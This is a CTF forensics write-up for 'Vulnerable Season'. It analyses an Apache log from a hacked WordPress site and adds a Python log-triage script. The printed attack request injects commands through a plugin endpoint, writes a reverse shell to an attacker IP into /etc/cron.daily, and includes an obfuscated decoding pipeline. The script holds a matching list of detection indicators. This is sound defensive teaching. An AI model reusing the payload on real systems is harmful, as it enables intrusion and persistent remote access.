
Vulnerable Season

Challenge

  • CTF: Hack The Boo 2023 - Practice Official Writeup
  • Name: Vulnerable Season
  • Category: Forensics
  • Difficulty: Very Easy
  • Points: 300
  • Description: Halloween season is a very busy season for all of us. Especially for web page administrators. Too many Halloween-themed parties to attend, too many plugins to manage. Unfortunately, our admin didn’t update the plugins used by our WordPress site and as a result, we got pwned. Can you help us investigate the incident by analyzing the web server logs?
  • Objective: Webserver Log Analysis

Files

Download: forensics_vulnerable_season.zip

Writeup

The challenge contains a single file called access.log, an Apache access log from the compromised web server.

Analyzing the traffic source IP address:

$ cat access.log | awk '{print $1}' | sort | uniq -c | sort -n
     16 ::1
     94 192.168.25.154
    148 68.124.212.176
    456 192.168.25.1
  11020 82.179.92.206

Since most of the traffic comes from 82.179.92.206, that is potentially the attacker's IP.

Analyzing the user agent of each request:

$ cat access.log | grep 82.179.92.206 | awk -F\" '{print $6}' | sort | uniq -c | sort -n
     84 Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  10936 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

The attacker used two distinct User Agents. Filtering on the one with the fewest requests (the high-volume one is most likely scanner traffic), we find an encoded payload in the last request:

$ cat access.log | grep 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' | tail -n 1
82.179.92.206 - - [28/Sep/2023:05:21:22 -0400] "GET /wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo%20%22sh%20-i%20%3E&%20/dev/tcp/82.179.92.206/7331%200%3E&1%22%20%3E%20/etc/cron.daily/testconnect%20&&%20Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo%20$Mz$Tz$Vz$az$Kz$Oz|base64%20-d|rev:NULL:NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

URL Decoding:

/wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo "sh -i >& /dev/tcp/82.179.92.206/7331 0>&1" > /etc/cron.daily/testconnect && Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev

The first part of the payload writes a reverse shell into /etc/cron.daily; the second part only decodes an obfuscated string. Running just that decoding part (the variable assignments and the echo | base64 -d | rev pipeline):

$ Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev
HTB{L0g_@n4ly5t_4_bEg1nN3r}
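The same triage as the shell pipelines above, written as a small Python script so it can be reused on other access logs: it parses Apache combined-format lines, counts sources and user agents, flags requests whose URL-decoded query carries command-execution indicators, and undoes the variable-shuffling base64/rev obfuscation seen in the payload. This is an added example, not part of the official writeup; the first two sample log lines are constructed, the third is the payload line from the log above.

```python
import base64
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Substrings that, once the query string is URL-decoded, point at command execution.
SUSPICIOUS = ("exec:", "/dev/tcp/", "base64 -d", "/etc/cron")
# Constructed sample: two made-up lines plus the real payload line from the writeup.
SAMPLE_LOG = """\
192.168.25.1 - - [28/Sep/2023:05:19:40 -0400] "GET /wordpress/ HTTP/1.1" 200 4321 "-" "Mozilla/5.0 (constructed browser)"
82.179.92.206 - - [28/Sep/2023:05:20:03 -0400] "GET /wordpress/wp-content/plugins/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
82.179.92.206 - - [28/Sep/2023:05:21:22 -0400] "GET /wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo%20%22sh%20-i%20%3E&%20/dev/tcp/82.179.92.206/7331%200%3E&1%22%20%3E%20/etc/cron.daily/testconnect%20&&%20Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo%20$Mz$Tz$Vz$az$Kz$Oz|base64%20-d|rev:NULL:NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"""

def parse_log(text):
    """Parse every well-formed line into a dict and add the URL-decoded request."""
    records = []
    for line in text.splitlines():
        if m := LOG_RE.match(line):
            rec = m.groupdict()
            rec["decoded"] = unquote(rec["request"])
            records.append(rec)
    return records

def top_sources(records):
    """Requests per source IP, busiest first (the awk | sort | uniq -c step)."""
    return Counter(r["ip"] for r in records).most_common()

def agents_for(records, ip):
    """User agents one source IP used, most frequent first."""
    return Counter(r["ua"] for r in records if r["ip"] == ip).most_common()

def flag_suspicious(records):
    """Records whose decoded request contains a command-execution indicator."""
    return [r for r in records if any(s in r["decoded"] for s in SUSPICIOUS)]

def deobfuscate(cmd):
    """Undo 'A=..;B=..;echo $A$B|base64 -d|rev': substitute vars, decode, reverse."""
    assigns = dict(re.findall(r"\b(\w+)=([A-Za-z0-9+/=]+)", cmd))
    m = re.search(r"echo ((?:\$\w+)+)\|base64 -d\|rev", cmd)
    if not m:
        return None
    joined = "".join(assigns[v] for v in re.findall(r"\$(\w+)", m.group(1)))
    return base64.b64decode(joined).decode()[::-1]
```

On the sample, flag_suspicious() returns only the admin-ajax.php request and deobfuscate() on its decoded query yields the flag without executing any part of the payload.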

Flag:

HTB{L0g_@n4ly5t_4_bEg1nN3r}

This post is licensed under CC BY 4.0 by the author.